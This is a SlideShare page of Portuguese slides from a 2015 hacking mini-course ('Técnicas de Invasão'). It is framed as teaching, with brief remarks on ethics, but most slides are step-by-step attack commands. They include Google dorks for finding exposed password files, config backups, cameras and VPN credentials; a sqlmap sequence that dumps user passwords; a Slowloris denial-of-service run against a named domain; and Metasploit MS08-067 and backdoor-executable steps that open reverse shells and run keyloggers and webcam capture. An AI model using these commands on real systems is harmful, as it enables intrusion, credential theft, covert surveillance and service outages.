Técnicas de Invasão - INFOESTE 2015

1.769 visualizações

Publicada em

Slides da apresentação do mini curso de Técnicas de Invasão do evento da INFOESTE de 2015.

Publicada em: Internet
0 comentários
12 gostaram
Estatísticas
Notas
  • Seja o primeiro a comentar

Sem downloads
Visualizações
Visualizações totais
1.769
No SlideShare
0
A partir de incorporações
0
Número de incorporações
4
Ações
Compartilhamentos
0
Downloads
56
Comentários
0
Gostaram
12
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Técnicas de Invasão - INFOESTE 2015

  1. 1. Técnicas de Invasões em Sistemas CienciaHacker
  2. 2. SUMÁRIO • O que são? • Por quem são usados? • Para que servem? • Ética Hacker • Principais Tipos e Métodos de Ataques: • Engenharia Social • Google Hacking • SQLi • DOS & DDOS • Exploits • Visão no Mercado de Trabalho e a Ética Hacker
  3. 3. AMBIENTE DE TRABALHO Máquinas virtuais: - Kali Linux - Windows XP e 7 Alvo para ataque: - http://testphp.vulnweb.com/
  4. 4. O que são? - São testes e métodos utilizados para romper mecanismos de segurança de um determinado alvo.
  5. 5. Técnicas mais utilizadas: • SQLi/BlindSQLi • CSS (XSS) • CSRF • Directory Transversal • LFI / RFI • Privilege Escalation • Social Engineering • Remote Command Execution • Buffer Overflow • Brute Force
  6. 6. Por quem são usados? - Por Hackers - Por Crackers - Por Pentesters - Por Analistas de Segurança da Informação
  7. 7. Definições dos Chapéus - White Hat (Chapéu Branco) - Black Hat (Chapéu Preto) - Gray Hat (Chapéu Cinza)
  8. 8. Ethical Hacker (Ética Hacker) Ética Hacker é o termo que descreve os valores morais e filosóficos na comunidade hacker. O ponto chave da ética é o livre acesso a informações e melhoria da qualidade de vida.
  9. 9. Para que servem (na visão White hat)? - Tem finalidade de testar em determinado alvo a qualidade de sua “segurança” a fim de prevenir um possível ataque e comprometimento da informação.
  10. 10. Engenharia Social • Práticas utilizadas para conseguir acesso a informações. Não é necessário nenhum equipamento para tal, apenas um aproveito da falha humana, e para isso é necessário somente habilidades de atuação: persuadir, explorar a confiança das pessoas. • Os tipos de exploração dessa técnica é através: Pessoas Sistemas
  11. 11. Engenharia Social  1. Pessoas • Exploração de algumas fragilidades do psicológico humano: ego, vaidade, a vontade de ser útil... • Técnicas utilizadas: telefonemas, e-mails falsos, vasculhação de lixo, e até aquisição de uma nova personalidade para se passar por outra pessoa. • Um engenheiro social se passando pelo chefe de um departamento ou suporte de T.I para solicitar informações de senhas e de usuários. • Quando as vítimas passam por essa situação, elas não percebem que estão sendo manipuladas. 1. Pessoas 2. Sistemas
  12. 12. Engenharia Social  2. Sistemas As técnicas utilizadas pelo golpista são apenas on-line, consistindo em: • Phishing: páginas falsas desenvolvidas para capturar dados da vítima. Essas páginas podem parecer legítimas e ter a mesma aparência de páginas já conhecidas. Exemplo de renovação de contas de bancos, boletos falsos, etc... • Malwares: Links(spans) ou anexos maliciosos. Ao serem abertos, atacam de forma silenciosa, permitindo ao golpista controle total do computador. • Arquivos PDF ou documentos Microsoft Office infectados.
  13. 13. Engenharia Social
  14. 14. Google Hacking • Utiliza mecanismo de busca para procurar falhas ou informações refinadas. • Onde podemos explorar falhas e invadir dispositivos eletrônicos como roteadores, sites/servidores, câmeras, impressoras, entre outros. • Podemos buscar dados de pessoas (podendo ser usando numa engenharia social). • Mais da metades dos ataques são ocorrida através deste método.
  15. 15. Dorks • São “strings” utilizadas pelo motor de busca as quais permite encontrar alvos vulneráveis. • Exemplo: “filetype:pdf inurl:hacking”
  16. 16. • intitle, allintitle - intitle: faz uma busca no conteúdo no título (tag title) da página. - allintitle: quebra a regra do exemplo acima, dizendo ao Google que todas as palavras que seguem devem ser encontradas no title da página (mais restrito). Exemplo “intitle: login.php”
  17. 17. • inurl, allinurl - inurl: encontra texto em uma URL. - alliurl: funciona de maneira idêntica ao inurl mas de forma restritiva, exibindo resultados apenas em que todas as strings foram encontradas. - Exemplo “inurl: admin”
  18. 18. • filetype - Busca por um arquivo de determinado tipo (extensão). O operador filetype pode ajudá-lo na busca de tipo de arquivos específicos. Mais especificamente, podemos utilizar esse operador para pesquisas de páginas que terminam em uma determinada extensão. Exemplo “filetype: xls”
  19. 19. • intext,allintext - intext: localiza uma string dentro do texto de uma página. - allintext: localiza o termo no texto da página. Utilizar o operador allintext também pode servir como um atalho para "encontrar esta string em qualquer lugar, exceto no title, URL e links". - Exemplo “intext: Dilma”
  20. 20. • Site - Direciona a pesquisa para o conteúdo de um determinado site. Apesar de ser tecnicamente uma parte da URL, o endereço (ou nome de domínio) de um servidor pode ser mais bem pesquisada com o operador site. Exemplo “site:gov.br”
  21. 21. Google Hacking • Buscando arquivos de anotações de senha: # intitle:”index of /” senhas.txt # filetype:txt + senha + com.br # filetype:txt intext:senha • Buscando backup de configurações de CMSs # intext:"~~Joomla1.txt" title:"Indexof /" Alvo interessante: http://tiagofeitosa.com/cb/ # configuration.php_ “<?phpclass Jconfig{“ # inurl:wp-config.old # inurl:configuration.php.bkp
  22. 22. Google Hacking • Invadindo impressora remota # intitle:”Web Image Monitor” & inurl:”/mainframe.cgi” • Buscando câmeras disponíveis na internet: # intitle:"Live View -AXIS 211" # inurl:"viewerframe?mode=motion“ # inurl:”/control/userimage.html” • Buscando por arquivos de VPN # !HOST=*.* intext:enc_UserPassword=* ext:pcf
  23. 23. Google Hacking Mais dorks.. • inurl:"passes" OR inurl:"passwords" OR inurl:"credentials" -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail • ext:sql intext:@gmail.com intext:password
  24. 24. • Ataque que permite a injeção no query (banco de dados) retornando parâmetro não validados. Como informações de tabelas e colunas a qual podemos extrair informações privilegiadas sendo senhas de usuários, e-mails, cartões de créditos, entre outras informações delicadas.
  25. 25. SQLi
  26. 26. Havij Sqlmap
  27. 27. SQLi • Buscando falha de SQLi – Manualmente – Google Hacking – Scanners (Nessus, Vega, Acunetix..)
  28. 28. SQLi (Sqlmap) Alvo: http://testphp.vulnweb.com/artists.php?artist=1 - Buscando o Banco de dados # sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs - Buscando as Tabelas # sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D Nome_do_Banco --tables -Buscando as Colunas # slqmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D Nome_do_Banco -T Nome_da_Tabela --columns -Extraindo os dados das Colunas #sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D Nome_do_Banco -T Nome_da_Tabela –C Nome_da_Colunas ‘nome,senha,email’ --dump
  29. 29. DOS & DDOS • Ataques que viabilizam emitir diversas requisições por segundo para um alvo sobrecarregando, fazendo com que o serviço fique indisponível.
  30. 30. Dos (Negação de Serviço)
  31. 31. DDos (Distribuição Dos)
  32. 32. Slowloris (instalação e ataque) Baixe a ferramenta: # wget http://ha.ckers.org/slowloris/slowloris.pl Atribui a permissão para executa-lo. # chmod 777 slowloris.pl Inicie o Ataque: # slowloris.pl -dns www.cienciahacker.cf -port 80 -timeout 5 -num 5000 -dns = indica o alvo, podendo ser um IP ou SITE -port = Porta para o ataque. -timeout = Tempo de espera entre cada ataque -num = numero de pacotes.
  33. 33. Exploits • Um exploit é um pedaço de software, um pedaço de dados ou uma sequência de comandos que tomam vantagem de um defeito, falha ou vulnerabilidade afim de causar um comportamento acidental ou imprevisto a ocorrer no software ou hardware de um computador ou em algum eletrônico (normalmente computadorizado). Tal comportamento frequentemente inclui coisas como ganhar o controle de um sistema de computador, permitindo elevação de privilégio ou um ataque de negação de serviço.
  34. 34. Exploitando Windows XP • Abrimos a ferramenta msfconsole. # msfconsole • E selecionamos o exploit a seguir: # use windows/smb/ms08_067_netapi • Depois disso colocaremos o IP da vítima. # set RHOST 192.168.2.108 • Selecionamos o nosso payload a qual permite a interação entre nós e a vítima. # set PAYLOAD windows/meterpreter/reverse_tcp
  35. 35. Exploitando Windows XP • E o nosso IP para receber a conexão. # set LHOST 192.168.2.103 • E o comando abaixo para executar o exploit já selecionado: # exploit Comandos Extras: • webcam_list, • webcam_snap, • shutdown -n • screenshot • keyscan_start • keyscan_dump • keyscan_stop • shutdown -s -t 1 • sysinfo
  36. 36. Exploitando Windows 7 e 8 • Criamos o nosso payload com nosso ip e a porta 4444 para se comunicar com a vitima e damos um nome a ele: #msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 x>name.exe • Abrimos o msfconsole que é a nossa interface do nossos exploits a serem usados #msfconsole • Agora colocamos o nosso computador em modo listening a qual deixa esperando uma conexão com nosso payload criado. #use exploit/multi/handler • E agora informamos qual o nosso payload que iremos receber nessa chamada #set payload windows/meterpreter/reverse_tcp
  37. 37. Exploitando Windows 7 e 8 • Depois disso colocamos o nosso IP para receber a conexão com a vitima. #set lhost IP • E o comando para executar nosso exploit. #exploit • Agora enviamos a vítima através do Apache #cp nome.exe /var/www #service apache2 start Agora só efetuar o download pelo IP do seu Apache e executar a backdoor.
  38. 38. Visão no Mercado de Trabalho • Carência de profissionais éticos • Certificações • Leis Cibernéticas
  39. 39. www.cienciahacker.com.br www.youtube.com.br/cienciahacker www.securityforce.org

×